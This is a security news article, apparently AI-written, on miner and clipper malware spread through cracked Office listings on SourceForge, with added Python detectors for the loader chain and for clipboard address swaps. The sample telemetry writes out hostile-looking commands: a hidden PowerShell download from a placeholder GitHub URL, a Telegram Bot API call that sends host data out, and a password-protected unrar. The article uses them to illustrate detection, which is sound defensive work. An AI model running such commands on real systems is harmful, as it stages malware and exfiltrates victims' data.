Ethical Hacking News
A growing concern for cybersecurity, this malicious campaign highlights the importance of vigilance in protecting users from falling prey to cryptocurrency miner and clipper malware. Learn more about how this threat is spreading through cracked software listings on SourceForge.
Cryptocurrency miner and clipper malware are being distributed through cracked software listings on SourceForge. Threat actors host the payloads on SourceForge under the guise of cracked versions of legitimate applications such as Microsoft Office. The majority of potential victims (90%) are Russian-speaking users, most of them located in Russia. The campaign was discovered on a project called officepackage, whose web page carried a long list of Microsoft Office applications in Russian together with download links. Clicking a link redirected the user to a different page hosted on "taplink[.]cc" that served a 7 MB ZIP archive. Unpacking it yielded an MSI installer that dropped several files, including UnRAR.exe, a RAR archive and a Visual Basic script that launched a PowerShell interpreter. The campaign illustrates how threat actors abuse popular, trusted platforms like SourceForge to distribute malware.
Cryptocurrency Miner and Clipper Malware Spread via Cracked SourceForge Software Listings
Cryptocurrency miner and clipper malware have been found spreading through cracked software listings on SourceForge, a platform many users still treat as a trustworthy download source. The case is a reminder that a hosting site's reputation says nothing about the code it hosts, and that downloads from unofficial listings have to be treated as untrusted.
According to Kaspersky, threat actors have been distributing cryptocurrency miner and clipper malware (a clipper silently replaces cryptocurrency wallet addresses that a victim copies to the clipboard with attacker-controlled ones, so payments are diverted) via SourceForge under the guise of cracked versions of legitimate applications like Microsoft Office. The campaign targets Russian-speaking users: 90% of potential victims are located in Russia.
One project, officepackage, on sourceforge.net was found to contain Microsoft Office add-ins copied from a legitimate GitHub project. On closer inspection, however, the project's web page carried a long list of Microsoft Office applications in Russian, each with a download link. Hovering over a download button showed a seemingly legitimate URL in the browser status bar, which helped convince users to click.
Clicking the link instead redirected the user to a completely different page hosted on "taplink[.]cc" that prominently displayed another Download button. That button delivered a 7 MB ZIP archive ("vinstaller.zip") containing two password-protected archives and a text file with the password to open them. Shipping the password in a side file is a common evasion: the encrypted archive cannot be inspected by the platform's or the endpoint's scanner, while the victim can still unpack it.
Inside the password-protected archive was an MSI installer that created several files: a console archive utility ("UnRAR.exe"), a RAR archive, and a Visual Basic (VB) script. The VB script launched a PowerShell interpreter to download and execute a batch file named confvk from GitHub. That batch file carried the password for the RAR archive, unpacked the malicious files it contained, and ran the next-stage script.
The batch file was also designed to run two PowerShell scripts - one of which sent system metadata using the Telegram API, while the other downloaded an additional batch script that then acted on the contents of the RAR archive. Furthermore, the confvk batch file created a new file named "ErrorHandler.cmd" that contained a PowerShell script programmed to retrieve and execute a text string through the Telegram API.
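Most of the chain described above (a script host launching PowerShell, a batch file fetched from GitHub, a password-protected RAR unpacked with UnRAR, Telegram Bot API traffic, the ErrorHandler.cmd stage) is visible in ordinary process-creation telemetry. The following Python is an added example written for this page, not code from the report or from Kaspersky: it scans Sysmon-style process events with one rule per stage and flags the sequence when several distinct stages show up together. The event records, file paths, the GitHub repository URL and the Telegram bot token in it are constructed sample data, not indicators from the campaign.

```python
import re


class ProcEvent:
    """Minimal process-creation record (Sysmon event ID 1 style)."""

    def __init__(self, parent_image, image, command_line):
        self.parent_image = parent_image
        self.image = image
        self.command_line = command_line


def basename(path):
    """Last path component, lower-cased; accepts both slash styles."""
    return re.split(r"[\\/]", path)[-1].lower()


# Command-line patterns for the individual stages.
DOWNLOAD_VERBS = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b")
GITHUB_RAW = re.compile(r"(?i)raw\.githubusercontent\.com|github\.com/[^\s'\"]+/raw/")
TELEGRAM_BOT_API = re.compile(r"(?i)api\.telegram\.org/bot")
UNRAR_PASSWORD = re.compile(r"(?i)(^|\s)-p\S+")  # unrar's -p<password> switch

SHELLS = {"powershell.exe", "pwsh.exe"}


def rule_script_host_spawns_powershell(e):
    """A VBS/JS script host starting PowerShell, as the dropped VB script does."""
    return basename(e.parent_image) in {"wscript.exe", "cscript.exe"} and basename(e.image) in SHELLS


def rule_powershell_github_download(e):
    """PowerShell pulling a file from GitHub (the confvk batch file stage)."""
    return (basename(e.image) in SHELLS
            and GITHUB_RAW.search(e.command_line) is not None
            and DOWNLOAD_VERBS.search(e.command_line) is not None)


def rule_telegram_bot_api(e):
    """Any process talking to the Telegram Bot API from its command line."""
    return TELEGRAM_BOT_API.search(e.command_line) is not None


def rule_unrar_with_password(e):
    """UnRAR invoked with an inline password, as the batch file does for the RAR stage."""
    return basename(e.image) == "unrar.exe" and UNRAR_PASSWORD.search(e.command_line) is not None


def rule_errorhandler_cmd(e):
    """The ErrorHandler.cmd file created by confvk being executed."""
    return "errorhandler.cmd" in e.command_line.lower()


RULES = [
    ("script_host_spawns_powershell", rule_script_host_spawns_powershell),
    ("powershell_github_download", rule_powershell_github_download),
    ("telegram_bot_api", rule_telegram_bot_api),
    ("unrar_with_password", rule_unrar_with_password),
    ("errorhandler_cmd", rule_errorhandler_cmd),
]


def classify(event):
    """Names of every rule the event matches, in RULES order."""
    return [name for name, check in RULES if check(event)]


def scan(events):
    """(index, matched rule names) for each event that matched at least one rule."""
    hits = []
    for i, e in enumerate(events):
        matched = classify(e)
        if matched:
            hits.append((i, matched))
    return hits


def is_chain(events, min_distinct_rules=3):
    """True when several *different* stages occur: single rules are noisy, the combination is not."""
    distinct = {name for _, names in scan(events) for name in names}
    return len(distinct) >= min_distinct_rules


# Constructed sample telemetry modelled on the chain in the text (hypothetical paths and URLs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\u\Downloads\installer.msi"'),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\AppData\Local\Temp\run.vbs"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              "powershell.exe -w hidden -c iwr https://raw.githubusercontent.com/example/repo/main/confvk -OutFile confvk.bat"),
    ProcEvent(CMD, PS,
              "powershell.exe -c iwr 'https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=1&text=host'"),
    ProcEvent(CMD, r"C:\Users\u\AppData\Local\Temp\UnRAR.exe",
              r"UnRAR.exe x -pSecret C:\Users\u\AppData\Local\Temp\payload.rar C:\Users\u\AppData\Local\Temp"),
    ProcEvent(CMD, CMD, r"cmd.exe /c C:\Users\u\AppData\Local\Temp\ErrorHandler.cmd"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Notepad++\notepad++.exe",
              r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt'),  # benign control
]

if __name__ == "__main__":
    for index, names in scan(SAMPLE_EVENTS):
        print(index, basename(SAMPLE_EVENTS[index].image), names)
    print("chain detected:", is_chain(SAMPLE_EVENTS))
```

Taken alone, the first two rules fire on plenty of legitimate developer activity, so the value lies in `is_chain`: requiring several distinct stages from the same host within a short window is what separates this loader from a build script. The UnRAR rule is deliberately not tied to the campaign's file names, since a password passed on the command line to an archive utility is the generic form of the "password in a side file" evasion and is worth surfacing regardless of what it unpacks.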
The campaign shows how threat actors lean on the reputation of platforms like SourceForge to put malware in front of users who would never run an executable from an unknown site. The Russian-language interface of the download page indicates who the intended audience is, consistent with the victim geography Kaspersky reported.
For defenders the practical takeaways are concrete. Cracked software is a long-established loader vector, and the tell-tale signs in this chain are generic: an archive shipped with its own password file, an MSI that drops an archive utility alongside a script, a VB script spawning PowerShell, and outbound traffic to GitHub and the Telegram Bot API from processes that have no business making it. Individuals and organizations should obtain software only from the vendor or an official store, verify publisher signatures before running installers, keep operating systems and applications patched, and, where policy allows, block or constrain script hosts such as wscript.exe for ordinary users.
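For clipper malware specifically, the advice above reduces to one check: the address you paste must be the address you copied. A clipper watches the clipboard and swaps a copied wallet address for an attacker-controlled address of the same type, so the detectable signature is two different addresses of the same scheme appearing on the clipboard within milliseconds of each other. The following Python is an added example written for this page, not code from the report: it classifies clipboard contents by wallet-address syntax and flags that swap in a recorded clipboard history. The clipboard history and every address in it are constructed sample values, not indicators from the campaign, and the two-second window is an assumption.

```python
import re

# Syntactic patterns for the wallet types clippers commonly target (no checksum validation).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "tron": re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$"),
    "monero": re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$"),
}


def address_type(text):
    """Return the wallet scheme the text looks like, or None if it is not an address."""
    s = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return name
    return None


def detect_swaps(clipboard_log, window_seconds=2.0):
    """
    clipboard_log: list of (timestamp_seconds, clipboard_text) in time order, as a
    clipboard-monitoring agent would record it.

    Flags the clipper signature: an address replaced by a *different* address of the
    *same* scheme almost immediately after it was copied. A person re-copying another
    address takes seconds; a clipper reacts within milliseconds of the change event.
    """
    swaps = []
    for (t_prev, prev), (t_cur, cur) in zip(clipboard_log, clipboard_log[1:]):
        scheme = address_type(prev)
        if scheme is None or scheme != address_type(cur):
            continue
        if prev.strip() != cur.strip() and (t_cur - t_prev) <= window_seconds:
            swaps.append({
                "scheme": scheme,
                "copied": prev.strip(),
                "replaced_with": cur.strip(),
                "delay": round(t_cur - t_prev, 3),
            })
    return swaps


def paste_matches_copy(copied, pasted):
    """The manual check a user can always do: compare the intended address with the pasted one."""
    return copied.strip() == pasted.strip()


# Constructed clipboard history (sample data, not from the report).
SAMPLE_LOG = [
    (0.00, "meeting notes"),
    (10.00, "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"),  # user copies the intended BTC address
    (10.04, "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"),  # replaced 40 ms later: clipper signature
    (30.00, "0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe"),  # user copies an ETH address
    (45.00, "0x52908400098527886E0F7030069857D2E4169EE7"),  # a different one 15 s later: benign
]

if __name__ == "__main__":
    for swap in detect_swaps(SAMPLE_LOG):
        print(f"[{swap['scheme']}] {swap['copied']} -> {swap['replaced_with']} after {swap['delay']}s")
```

The timing threshold matters more than the address patterns: without it, a user who legitimately copies two addresses in a row is indistinguishable from a swap, and with it the only false positives are automation tools that rewrite the clipboard on purpose. The checksum-free patterns are enough for detection, since the point is to notice that the scheme stayed the same while the address changed, not to validate either address.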
Separately, malicious ads have been observed delivering tampered versions of RVTools, a popular VMware utility. That case is a reminder that malvertising remains a persistent vector for delivering malicious payloads, and that the same verification discipline applies to downloads reached through search results and ads.
In conclusion, the real lesson of the campaign is that a trusted hosting platform is not a trust signal for the files it hosts: the same download hygiene and endpoint controls apply whether an installer came from a torrent site or from SourceForge.
Related Information:
https://www.ethicalhackingnews.com/articles/Cryptocurrency-Miner-and-Clipper-Malware-Spread-via-SourceForge-Cracked-Software-Listings-A-Growing-Concern-for-Cybersecurity-ehn.shtml
https://thehackernews.com/2025/04/cryptocurrency-miner-and-clipper.html
Published: Tue Apr 8 13:34:59 2025 by llama3.2 3B Q4_K_M